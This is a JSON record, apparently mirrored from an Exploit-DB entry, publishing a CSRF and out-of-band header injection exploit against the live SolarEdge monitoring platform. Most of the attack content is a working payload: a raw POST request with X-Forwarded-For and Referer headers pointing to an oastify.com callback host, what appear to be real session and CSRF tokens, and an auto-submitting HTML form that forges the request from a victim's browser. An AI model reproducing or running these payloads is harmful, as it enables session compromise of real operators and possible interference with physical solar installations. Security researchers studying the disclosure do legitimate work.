{“lastseen”:”2026-05-21T13:27:56″,”description”:”Titles: solaredge – CSRF-OOB-Injection Author: nu11secur1tyAI Date: 2026-04-26 Vendor: SolarEdge Technologies Ltd. Software: SolarEdge Monitoring Platform – Framework \/solaredge-web\/ Reference: https:\/\/monitoring.solaredge.com\/ Description: The…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”exploitdb”,”title”:”solaredge – (CSRF-OOB-Injection)”,”source”:””,”references”:””,”id”:”EDB-ID:52569″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: solaredge – (CSRF-OOB-Injection)\\r\\n# Author: nu11secur1tyAI\\r\\n# Date: 2026-04-26\\r\\n# Vendor: SolarEdge Technologies Ltd.\\r\\n# Software: SolarEdge Monitoring Platform – Framework \/solaredge-web\/\\r\\n# Reference: https:\/\/monitoring.solaredge.com\/\\r\\n\\r\\n## Description:\\r\\nThe solaredge-CSRF-Hijack vulnerability arises due to a critical business\\r\\nlogic flaw in the `\/solaredge-web\/p\/initClient` endpoint. The system allows\\r\\nthe generation and overwriting of session parameters (`createCookie`) via\\r\\nPOST requests that are not properly validated against their origin.\\r\\n\\r\\nAn attacker can exploit this flaw to force a legitimate operator’s browser\\r\\nto execute unauthorized commands without their knowledge. Additionally, an\\r\\nOut-of-Band (OOB) injection vulnerability was discovered via the\\r\\n`X-Forwarded-For` and `Referer` headers. By manipulating these headers, an\\r\\nattacker forces the SolarEdge internal infrastructure to initiate requests\\r\\nto external, attacker-controlled domains (e.g., oastify.com or a custom\\r\\nmalicious site). This demonstrates a lack of framework-level filtration,\\r\\nleading to session compromise and potential unauthorized control over\\r\\nphysical photovoltaic systems.\\r\\n\\r\\nSTATUS: MEDIUM – HIGH\/ Vulnerability\\r\\n\\r\\n[+]Payload:\\r\\n“` POST\\r\\nPOST\\r\\n\/solaredge-web\/p\/initClient?cmd=createCookie\\u0026target=login\\u0026client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue\\r\\nHTTP\/2\\r\\nHost: monitoring.solaredge.com\\r\\nCache-Control: max-age=0\\r\\nSec-Ch-Ua: \\”Chromium\\”;v=\\”146\\”, \\”Not;A=Brand\\”;v=\\”24\\”, \\”Google Chrome\\”;v=\\”146\\”\\r\\nSec-Ch-Ua-Mobile: ?0\\r\\nSec-Ch-Ua-Platform: \\”Windows\\”\\r\\nX-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com\\r\\nAccept-Language: en-US;q=0.9,en;q=0.8\\r\\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\r\\n(KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36\\r\\nAccept: *\/*\\r\\nSec-Fetch-Site: none\\r\\nSec-Fetch-Mode: navigate\\r\\nSec-Fetch-User: ?1\\r\\nSec-Fetch-Dest: document\\r\\nAccept-Encoding: gzip, deflate, br\\r\\nCookie:\\r\\nJSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2;\\r\\ncf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ;\\r\\n__cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb;\\r\\nCSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90\\r\\nOrigin: https:\/\/monitoring.solaredge.com\\r\\nReferer:\\r\\nhttp:\/\/cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com\/vulnerabilities\/\\r\\nContent-Length: 0\\r\\n\\r\\n“`\\r\\n\\r\\n[+]Exploit:\\r\\n“`html\\r\\n\\u003chtml\\u003e\\r\\n \\u003c!– CSRF PoC –\\u003e\\r\\n \\u003cbody\\u003e\\r\\n \\u003cform action=\\”\\r\\nhttps:\/\/monitoring.solaredge.com\/solaredge-web\/p\/initClient?cmd=createCookie\\u0026target=login\\u0026client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue\\”\\r\\nmethod=\\”POST\\”\\u003e\\r\\n \\u003cinput type=\\”submit\\” value=\\”Submit request\\” \/\\u003e\\r\\n \\u003c\/form\\u003e\\r\\n \\u003cscript\\u003e\\r\\n history.pushState(”, ”, ‘\/’);\\r\\n document.forms[0].submit();\\r\\n \\u003c\/script\\u003e\\r\\n \\u003c\/body\\u003e\\r\\n\\u003c\/html\\u003e\\r\\n\\r\\n“`\\r\\n\\r\\n# Demo:\\r\\n[href](https:\/\/www.patreon.com\/posts\/solaredge-csrf-156577436)\\r\\n\\r\\n# Time spent:\\r\\n01:25:00\\r\\n\\r\\n–\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstormsecurity.com\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\nnu11secur1ty \\u003chttps:\/\/www.asc3t1c-nu11secur1ty.com\/\\u003e\\r\\n\\r\\n– \\r\\n\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstorm.news\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\n0day Exploit DataBase https:\/\/0day.today\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52569″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52569″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-21T13:27:56″,”description”:”Titles: solaredge – CSRF-OOB-Injection Author: nu11secur1tyAI Date: 2026-04-26 Vendor: SolarEdge Technologies Ltd. Software: SolarEdge Monitoring Platform – Framework \/solaredge-web\/ Reference: https:\/\/monitoring.solaredge.com\/ Description: The…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”exploitdb”,”title”:”solaredge – (CSRF-OOB-Injection)”,”source”:””,”references”:””,”id”:”EDB-ID:52569″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-56067","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n